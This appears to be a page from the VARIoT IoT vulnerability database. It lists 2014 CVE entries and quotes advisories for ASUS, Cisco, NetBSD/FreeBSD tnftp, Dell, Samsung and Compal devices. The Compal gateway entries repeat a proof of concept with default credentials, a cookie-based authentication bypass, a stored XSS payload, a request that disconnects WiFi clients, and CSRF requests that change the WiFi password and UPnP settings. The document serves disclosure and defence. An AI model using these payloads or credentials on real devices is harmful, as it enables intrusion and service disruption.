VARIoT IoT vulnerabilities database
| VAR-201411-0483 | CVE-2014-2718 | ASUS RT Series router firmware arbitrary code execution vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image. Supplementary information : CWE Vulnerability type by CWE-345: Insufficient Verification of Data Authenticity ( Inadequate verification of data reliability ) Has been identified. ASUS RT-Series Wireless Routers is a wireless router device. There is a middleman security bypass vulnerability in ASUS RT Series Wireless Routers. An attacker can exploit a vulnerability to bypass certain restrictions and obtain sensitive information. The following products are affected: ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. In short, the router downloads via clear-text a
file from http://dlcdnet.asus.com, parses it to determine the latest
firmware version, then downloads (again in the clear) a binary file
matching that version number from the same web site. No HTTP = no assurance
that the site on the other end is the legitimate ASUS web site, and no
assurance that the firmware file and version lookup table have not been
modified in transit.
In the link below I describe the issue in detail, and demonstrate a proof
of concept through which I successfully caused an RT-AC66R to "upgrade" to
an older firmware with known vulnerabilities. In concept it should also be
possible to deliver a fully custom malicious firmware in the same manner.
This applies to the RT-AC68U, RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R,
RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. It may also apply to the
RT-N53, RT-N14U, RT-N16, and RT-N16R since they use the same firmware base
but a different sub-version.
This has been fixed as an undocumented feature of the 376 firmware branch
(3.0.0.4.376.x).
Details and POC:
http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html
--
Regards,
David Longenecker
@dnlongen
| VAR-201410-0991 | CVE-2014-3293 | ASR901 Runs on device Cisco IOS Denial of service in Japan (DoS) Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco IOS 15.4(3)S0b on ASR901 devices makes incorrect decisions to use the CPU for IPv4 packet processing, which allows remote attackers to cause a denial of service (BGP neighbor flapping) by sending many crafted IPv4 packets, aka Bug ID CSCuo29736. The Cisco ASR 901 Series Routers are router devices issued by Cisco. A denial of service vulnerability exists in the Cisco ASR 901 Series Routers that could allow an attacker to reload an affected device and deny service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuo29736
| VAR-201411-0457 | CVE-2014-8517 | NetBSD Used in tnftp of usr.bin/ftp/fetch.c Inside fetch_url Arbitrary command execution vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The fetch_url function in usr.bin/ftp/fetch.c in tnftp, as used in NetBSD 5.1 through 5.1.4, 5.2 through 5.2.2, 6.0 through 6.0.6, and 6.1 through 6.1.5 allows remote attackers to execute arbitrary commands via a | (pipe) character at the end of an HTTP redirect. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. tnftp is prone to a remote arbitrary command-execution.
An attacker can exploit this issue to execute arbitrary commands in the context of the affected application. NetBSD is a free and open source Unix-like operating system developed by the NetBSD Foundation. The following versions are affected: NetBSD 5.1 to 5.1.4, 5.2 to 5.2.2, 6.0 to 6.0.6, 6.1 to 6.1.5.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201611-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: tnftp: Arbitrary code execution
Date: November 15, 2016
Bugs: #527302
ID: 201611-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
tnftp is vulnerable to remote code execution if output file is not
specified.
Resolution
==========
All tnftp users should upgrade to the latest version:
<code>
# emerge --sync
# emerge --ask --verbose --oneshot ">=net-ftp/tnftp-20141104"
References
==========
[ 1 ] CVE-2014-8517
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8517
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201611-05
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
=============================================================================
FreeBSD-SA-14:26.ftp Security Advisory
The FreeBSD Project
Topic: Remote command execution in ftp(1)
Category: core
Module: ftp
Announced: 2014-11-04
Credits: Jared McNeill, Alistair Crooks
Affects: All supported versions of FreeBSD.
Corrected: 2014-11-04 23:29:57 UTC (stable/10, 10.1-PRERELEASE)
2014-11-04 23:34:46 UTC (releng/10.1, 10.1-RC4-p1)
2014-11-04 23:34:46 UTC (releng/10.1, 10.1-RC3-p1)
2014-11-04 23:34:46 UTC (releng/10.1, 10.1-RC2-p3)
2014-11-04 23:31:17 UTC (releng/10.0, 10.0-RELEASE-p12)
2014-11-04 23:30:47 UTC (stable/9, 9.3-STABLE)
2014-11-04 23:33:46 UTC (releng/9.3, 9.3-RELEASE-p5)
2014-11-04 23:33:17 UTC (releng/9.2, 9.2-RELEASE-p15)
2014-11-04 23:32:45 UTC (releng/9.1, 9.1-RELEASE-p22)
2014-11-04 23:30:23 UTC (stable/8, 8.4-STABLE)
2014-11-04 23:32:15 UTC (releng/8.4, 8.4-RELEASE-p19)
CVE Name: CVE-2014-8517
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.
I. Background
The ftp(1) userland utility is an interactive FTP client. It can also
be used non-interactively, by providing a URL on the command line. In
this mode, it supports HTTP in addition to FTP.
II.
III. Impact
When operating on HTTP URIs, the ftp(1) client follows HTTP redirects,
and uses the part of the path after the last '/' from the last
resource it accesses as the output filename if '-o' is not specified.
IV. Workaround
No workaround is available. Users are encouraged to replace ftp(1) in
non-interactive use by either fetch(1) or a third-party client such as
curl or wget.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8]
# fetch http://security.FreeBSD.org/patches/SA-14:26/ftp-8.patch
# fetch http://security.FreeBSD.org/patches/SA-14:26/ftp-8.patch.asc
# gpg --verify ftp-8.patch.asc
[All other versions]
# fetch http://security.FreeBSD.org/patches/SA-14:26/ftp.patch
# fetch http://security.FreeBSD.org/patches/SA-14:26/ftp.patch.asc
# gpg --verify ftp.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile ftp. Execute the following commands as root:
# cd /usr/src/usr.bin/ftp
# make && make install
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r274108
releng/8.4/ r274111
stable/9/ r274109
releng/9.1/ r274112
releng/9.2/ r274113
releng/9.3/ r274114
stable/10/ r274107
releng/10.0/ r274110
releng/10.1/ r274115
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:http://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. References
<URL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8517>
The latest revision of this advisory is available at
<URL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:26.ftpd.asc>
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCgAGBQJUWWUQAAoJEO1n7NZdz2rnhUwP+wQKrgKs6lRk6Yl4UtRyEwyG
BHGkA62oaQbehuccahjQgIcLTk3Vp3AalXtSQpdyWJktHiYrFwBnheW/IrhJ6bMS
dpJv3yqqQtSED9sADf+GAvxV6TG9bknq/RDxXKpsQ/MocYbiVxz/3nDOMz9CB7ep
saDttvGHW7RUmNoKL70pgItGapiVuBzMF01PCZ2SmFiJHYi7BoiJwm72Y1NLU8YE
TkiX2ZAoTVMN5/R3DW38HyVCyeY2tMTHSdQXRSYjwzJ0gEbBPWMPQyB1SAa8dtk5
j54KFNOBoaXMjd3USqFgo0fduU3rGZp5PwITTx5Rx5Ixtz2vHddyOISV0RcjA0cq
TWDwBGlKET7qZ1j7nHTgy4U4wMTWFbkjjqEY+RHYywaAmy8ACDmEUci8d3fWKWVY
d4y8RCvBrlnFVjmNiNcBc5XFXxY0Ra3BQ8C/VE0k0ZFuzmFUCi+DJZDR2Gtl0R9Q
1hAdj+yOJo46ylHPiSyoBZmsRZccV1a81phOPe0mPR84BvzNvBsdI+EFIJWi+5bw
bjuSM8YCOHrlGkqh9h9+BizvLfJFpjUSglwzPmOfRpTv59XJpc6D1Hia+uICTEfd
lSiJgDZ6enozY7QVoiO7G/ycyQCVe7Ehwywx/dpWXVpva85tn4Xl2khBCiPNbBBo
xnPjqxmwGK+4uegsO6CY
=QT3h
-----END PGP SIGNATURE-----
| VAR-201411-0177 | CVE-2014-8654 | Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Cross-site request forgery vulnerability in hardware firmware |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html. (2) setWirelessSecurity.html of psKey Via parameters wifi The password is changed. (3) setBasicDHCP1.html of add_static In action MacAddress Static via parameters MAC An address is added. (4) setAdvancedOptions.html of apply Of UPnP Via parameters UPnP Is enabled or disabled. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Ch664oe Wireless Gateway is prone to a cross-site request forgery vulnerability. The 'UPnP' parameter in the apply action of the html page exploits this vulnerability to enable or disable UPnP.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
| VAR-201411-0178 | CVE-2014-8655 | Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Vulnerabilities that can bypass authentication in some firmware |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml. (1) xml/ of CmgwWirelessSecurity.xml (2) xml/ of DocsisConfigFile.xml (3) xml/ of CmgwBasicSetup.xml (4) basicDDNS.html (5) basicLanUsers.html (6) rootDesc.xml. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Cg6640e Wireless Gateway is prone to a information disclosure vulnerability.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
| VAR-201411-0179 | CVE-2014-8656 | Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Vulnerabilities in certain firmware that gain access to certain critical information |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities
2. A denial-of-service vulnerability
3. An HTML-injection vulnerability
4. Other attacks are also possible. A remote attacker could exploit this vulnerability to gain access to sensitive information.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
| VAR-201411-0180 | CVE-2014-8657 | Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Service disruption in other firmware (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities
2. A denial-of-service vulnerability
3. An HTML-injection vulnerability
4. Other attacks are also possible.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
| VAR-201410-0029 | CVE-2013-3304 | Dell EqualLogic PS4000 Directory traversal vulnerability in some firmware |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Dell EqualLogic PS4000 with firmware 6.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the default URI. Dell EqualLogicis prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks.
Dell EqualLogic Firmware versions 6.0 through 6.0.3 are vulnerable. Dell EqualLogic PS4000 is a server disk array product of Dell (Dell), which integrates storage devices, blade servers and network devices into an expandable virtualized data center
| VAR-201411-0176 | CVE-2014-8653 | Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Firmware cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Firmware is prone to a cross-site scripting vulnerability.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
| VAR-201410-0068 | CVE-2014-3409 | Cisco IOS and IOS XE of Ethernet Connectivity Fault Management Service disruption in processing functions (DoS) Vulnerabilities |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
The Ethernet Connectivity Fault Management (CFM) handling feature in Cisco IOS 12.2(33)SRE9a and earlier and IOS XE 3.13S and earlier allows remote attackers to cause a denial of service (device reload) via malformed CFM packets, aka Bug ID CSCuq93406. Vendors have confirmed this vulnerability Bug ID CSCuq93406 It is released as.Malformed by a third party CFM Service disruption via packets ( Device reload ) There is a possibility of being put into a state. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. An attacker could exploit this vulnerability for a denial of service attack.
Successful exploits may allow attackers to cause the device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug IDs CSCuq93406 and CSCur49659
| VAR-201410-1185 | CVE-2014-8346 | Samsung Mobile device Remote Controls Service disruption in functionality (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Remote Controls feature on Samsung mobile devices does not validate the source of lock-code data received over a network, which makes it easier for remote attackers to cause a denial of service (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic. Remote Controls feature on Samsung mobile devices is a remote control feature used by Samsung in South Korea for Samsung mobile devices. Mobile is prone to a denial-of-service vulnerability
| VAR-201411-0062 | CVE-2014-4974 | plural ESET Used in products ESET Personal Firewall NDIS Vulnerability in the acquisition of important information in the filter kernel mode driver |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
